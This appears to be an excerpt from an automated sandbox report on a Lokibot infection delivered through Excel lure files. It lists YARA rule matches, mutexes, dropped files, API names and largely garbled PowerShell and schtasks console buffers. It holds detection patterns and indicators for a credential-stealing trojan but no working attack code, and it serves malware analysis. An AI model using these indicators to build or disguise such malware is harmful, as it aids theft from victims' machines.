                    Source: 0000000B.00000002.470705091.0000000002410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 0000000B.00000002.470705091.0000000002410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000000B.00000002.471306771.000000000350F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 0000000B.00000002.471306771.000000000350F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 0000000B.00000002.471306771.000000000350F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000000B.00000002.471306771.0000000003529000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 0000000B.00000002.471306771.0000000003529000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 0000000B.00000002.471306771.0000000003529000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000015.00000002.500711423.0000000002591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: 00000015.00000002.500711423.0000000002591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                    Source: 00000015.00000002.500711423.0000000002591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: Process Memory Space: caspol.exe PID: 3888, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: Process Memory Space: rrwscqkDSNwLK.exe PID: 1644, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: Process Memory Space: rrwscqkDSNwLK.exe PID: 3576, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: Process Memory Space: caspol.exe PID: 4076, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                    Source: caspol[1].exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: caspol.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: rrwscqkDSNwLK.exe.11.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, a6RnQjwUyOApqVRoTt.csSecurity API names: _0020.SetAccessControl
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, a6RnQjwUyOApqVRoTt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, a6RnQjwUyOApqVRoTt.csSecurity API names: _0020.AddAccessRule
                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, zHSLcC0xi2VDKUoIki.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engine | Classification label: mal100.phis.troj.spyw.expl.evad.winXLS@52/60@3/3
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Code function: 28_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize, 28_2_0040434D
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\CA430000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Mutant created: \Sessions\1\BaseNamedObjects\DE4229FCF97F5879F50F8FD3
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Mutant created: \Sessions\1\BaseNamedObjects\otkaVhUbioxCcU
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR9FF6.tmp
                    Source: Payment Advice.xls | OLE indicator, Workbook stream: true
                    Source: PORTS SITUATION BULK CARRIERS.xlsx.0.dr | OLE indicator, Workbook stream: true
                    Source: CA430000.0.dr | OLE indicator, Workbook stream: true
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: .................Pp.............0.........................................................,..............3......................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................h(..............................}..w.............................1......(.P.....................................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: .................Pp.............................}..w.............................1......(.P..............3......................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................Cmp.......................xk....}..w............\.......................(.P.....................X...............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................................}..w.............!j.....o.xk......i.....(.P.....................................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................Cmp.......................xk....}..w............\.......................(.P.....................X...............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................................}..w.............!j.....o.xk......i.....(.P.....................................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..!j.....o.xk......i.....(.P............................. .......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................+. .D.e.V.i.C.e.c.R.e.D.e.n.T.I.a.l.d.E.p.L.O.y.m.e.n.t.(.P.............................8.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.(.P.............................8.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................................}..w.............!j.....o.xk......i.....(.P.....................................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................ . . .n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...................F.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................................}..w.............!j.....o.xk......i.....(.P.............................l.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................ ...............}..w.............!j.....o.xk......i.....(.P.....................................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....t.......|.......X.......m..........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....t.......|.......X..................................s............h...............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....t.......|.......X..................................s............................(...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....t.......|.......X..................................s............h...............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....t.......|.......X..................................s............................(...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....t.......|.......X..................................s............h...............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................a.g.a.i.n.......t.......|.......X.......$..........................s............h...............(...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....t.......|.......X.......<..........................s............h...............(...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.X.......`..........................s............h....... .......(...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....t.......|.......X.......x..........................s............h...............(...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....t.......|.......X..................................s............................(...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....t.......|.......X..................................s............h...............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~................................s............h.......$.......(...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....t.......|.......X..................................s............h...............(...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....t.......|.......X..................................s............................(...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....t.......|.......X.......,..........................s............h...............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............h.......2.......(...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....t.......|.......X.......f..........................s............h...............(...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....t.......|.......X..................................s....................l.......(...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....t.......|.......X..................................s............h...............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................ .......(.P.....t.......|.......X..................................s............h...............(...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....t.......|.......X..................................s............h...............(...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....................`.......o..........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....................`..................................s............(...............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....................`..................................s............................(...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....................`..................................s............(...............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....................`..................................s............................(...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....................`..................................s............(...............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................a.g.a.i.n.......................`.......&..........................s............(...............(...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....................`.......>..........................s............(...............(...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.`.......b..........................s............(....... .......(...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....................`.......z..........................s............(...............(...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....................`..................................s............................(...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....................`..................................s............(...............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~................................s............(.......$.......(...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....................`..................................s............(...............(...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....................`..................................s............................(...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....................`..................................s............(...............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............(.......2.......(...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....................`.......l..........................s............(...............(...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....................`..................................s....................l.......(...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....................`..................................s............(...............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................ .......(.P.....................`..................................s............(...............(...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....................`..................................s............(...............(...............
                    Source: C:\Windows\SysWOW64\schtasks.exe | Console Write: ................0.......................(.P.............$.......<........~......................................................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....................<..................................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....................<..................................s............x...............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....................<..................................s............................H...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....................<..................................s............x...............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....................<.......&..........................s............................H...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....................<.......2..........................s............x...............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................a.g.a.i.n.......................<.......D..........................s............x...............H...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....................<.......P..........................s............x...............H...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.<.......b..........................s............x....... .......H...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....................<.......n..........................s............x...............H...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....................<..................................s............................H...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....................<..................................s............x...............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~................................s............x.......$.......H...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....................<..................................s............x...............H...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....................<..................................s............................H...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....................<..................................s............x...............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............x.......2.......H...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....................<..................................s............x...............H...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....................<..................................s....................l.......H...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....................<..................................s............x...............................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................ .......(.P.....................<..................................s............x...............H...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....................<......."..........................s............x...............H...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....H...............<..................................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....H...............<..................................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....H...............<..................................s............................8...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....H...............<..................................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....H...............t.......5..........................s............................8...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....H...............t.......A..........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................a.g.a.i.n.......H...............8.......\..........................s............................8...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....H...............8.......i..........................s............................8...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.8.......}..........................s.................... .......8...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....H...............8.......P..........................s............................8...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....H.......................f..........................s............................8...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....H...............8.......u..........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~................................s....................$.......8...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....H...............8..................................s............................8...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....H..................................................s............................8...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....H..................................................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s....................2.......8...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....H..................................................s............................8...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....H..................................................s....................l.......8...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....H...............P..................................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................ .......(.P.....H...............P..................................s............................8...............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ........................................(.P.....H...............P.......(..........................s............................8...............
                    Source: C:\Windows\SysWOW64\schtasks.exe | Console Write: ....................0.'.........E.R.R.O.R.:. ...................8...............................................X.........................'.....
                    Source: C:\Windows\SysWOW64\schtasks.exe | Console Write: ....................0.'.........E.R.R.O.(.P.....................8.......................................................j.......H.........'.....
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: .................P..............0.x.......x.....0g......................0g......8g.......................3......................0g..............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................x.....}..w......x......................1......(.P.....@.......D.......................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..!..............P................x.......x.....}..w.............................1......(.P..............3........!.............@...............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.........................l....}..w....@.......\.......................(.P.....@.......D.......h...............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..!.....................................@.......}..w..............h.....9..l......g.....(.P.....@.......D.........!.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.........................l....}..w....@.......\.......................(.P.....@.......D.......h...............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..!.....................................@.......}..w..............h.....9..l......g.....(.P.....@.......D.........!.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1...h.....9..l......g.....(.P.....@.......D............... .......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .D.e.V.i.C.e.c.R.e.D.e.n.T.I.a.l.d.E.p.L.O.y.m.e.n.t.(.P.....@.......D...............8.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.(.P.....@.......D...............8.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..!.....................................@.......}..w..............h.....9..l......g.....(.P.....@.......D.........!.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...D...............F.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..!.....................................@.......}..w..............h.....9..l......g.....(.P.....@.......D.........!.....l.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......@.......}..w..............h.....9..l......g.....(.P.....@.......D.......................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................\..........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................h..........................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................z..........................s..............................%.............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s..............................%.............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n..........................................................s..............................%.............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s..............................%.............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1....................................s.................... .........%.............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s..............................%.............
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s..............................%.............
